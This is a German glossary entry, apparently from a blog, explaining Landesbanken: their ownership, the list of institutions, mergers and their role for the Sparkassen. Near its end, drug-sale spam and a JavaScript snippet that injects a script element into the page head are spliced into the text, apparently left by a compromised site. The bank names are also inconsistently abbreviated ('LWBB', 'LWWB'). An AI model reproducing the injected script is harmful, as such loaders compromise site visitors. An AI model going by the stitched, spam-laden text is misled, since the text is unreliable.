Landesbank

Die Landesbanken sind öffentlich-rechtliche Finanzunternehmen, die hinsichtlich der wirtschaftlichen Struktur eine wichtige Rolle einnehmen und verschiedene Aufgabenbereiche übernehmen. Sie unterstützen die Förderung der Wirtschaft in den jeweiligen Bundesländern und gehören alle dem Bundesverband Öffentlicher Banken Deutschland (VÖB) an.

Landesbanken in Deutschland
Die Landesbanken werden von den Bundesländern sowie den Sparkassen- und Girobanken getragen. In jedem alten Bundesland gibt es eine Landesbank, in den neuen Bundesländern lediglich in Sachsen (in Verbindung mit der Südwest-Landesbank). Einige Landesbanken haben sich auch zusammengeschlossen, um so eine größere Reichweite zu erzielen.

Im einzelnen gibt es folgende Landesbanken in Deutschland:
Bayrische Landesbank, Bremer Landesbank Kreditanstalt Oldenburg (Norddeutsche Landesbank mit 54,83% beteiligt), HSH Nordbank AG, Landesbank Baden-Württemberg, Landesbank Hessen-Thüringen, Norddeutsche Landesbank, Landesbank Saar (Bayrische Landesbank mit 49,9% beteiligt). Zudem fusionierten 2003 die Hamburgische Landesbank und die Landesbank Schleswig-Holstein zur HSH Nordbank. Die Landesbank Baden-Württemberg (LWBB) entstand aus der Fusion mit mehreren Landesbanken. Bereits 1988 taten sich die Badische Kommunale Landesbank und die Landesbank Stuttgart zur SüdwestLB zusammen, um dann 1999 mit der LWBB zu fusionieren. 2008 verschmolzen die Landesbank Rheinland-Pfalz und die SachsenLB ebenfalls mit der LWWB. Die WestLB wurde zum 01.07.2012 aufgelöst, während die Landesbank Berlin an die Sparkassen-Finanzgruppe veräußert wurde.

Aufgaben der Landesbanken
Sofern es die Satzung der jeweiligen Landesbank zulässt, werden von ihnen auch die banküblichen Tätigkeiten (z. B. Wertpapiergeschäfte, Auslandsgeschäfte) durchgeführt. Als Zentralinstitut der Sparkassen fungieren die Landesbanken als zentrale Verrechnungsstelle für den unbaren Zahlungsverkehr und verwalten das Liquiditätsguthaben der jeweiligen Sparkassen in ihrem Einzugsgebiet. Zudem sind sie für deren Refinanzierung (z. B. durch die Ausgabe von Pfandbriefen, Kommunalobligationen, Inhaberschuldverschreibungen) zuständig. Im Rahmen der Wirtschaftsförderung durch den Bund vergeben die Landesbanken die Fördergelder an Unternehmen und Privathaushalte in Form zinsgünstiger Darlehen. Die Konditionen für die Tilgungsmöglichkeiten hängen dabei von den Förderprogrammen ab und werden meist durch den Bund oder die Landesregierungen festgelegt. cheap Paxil purchase Furosemide buy Strattera 40 mg var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.